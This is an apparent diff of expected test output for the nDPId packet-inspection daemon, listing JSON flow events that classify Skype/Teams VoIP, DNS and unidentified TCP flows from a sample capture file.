-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634729,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970670304,"flow_last_seen":1431970696803,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687262,"flow_last_seen":1431970707409,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634729,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970635489,"flow_last_seen":1431970690062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":2405,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1431970688781,"flow_last_seen":1431970693454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1431970688781,"flow_last_seen":1431970693454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634276,"flow_last_seen":1431970660781,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634276,"flow_last_seen":1431970660781,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431970690191,"flow_last_seen":1431970705014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
